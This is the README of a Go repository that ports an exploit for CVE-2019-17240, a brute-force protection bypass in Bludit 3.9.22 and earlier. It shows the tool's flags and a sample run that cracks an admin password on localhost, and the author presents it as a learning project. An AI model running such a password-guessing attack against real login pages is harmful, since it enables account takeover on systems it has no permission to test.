cve-2019-17240: A Go repository from spyx

Bludit <= 3.9.22 - Bruteforce Mitigation Bypass

This is small project where I rewrite this python script into golang. Purpose of this project was to learn Golang and understand how this exploit work.

Usage

$ ./brutepass -sdasds                                                             
flag provided but not defined: -sdasds
Usage of ./brutepass:
  -c int
        Threads (default 5) (default 5)
  -l string
        Hostname eg... http://127.0.0.1/admin/login.php
  -p string
        Password file
  -u string
        Enter username

Except threads flag all other flags are mandantory.

$ ./cve-2019-17240 -p pass.txt -u admin -l "http://127.0.0.1/admin/login.php"
Total requests sent: 10 
Total requests sent: 20 
Total requests sent: 30 
Total requests sent: 40 
Total requests sent: 50 
Total requests sent: 60 
Total requests sent: 65 
==========Password Cracked=============
Password: Password

spyx/cve-2019-17240

Bludit <= 3.9.22 - Bruteforce Mitigation Bypass

Usage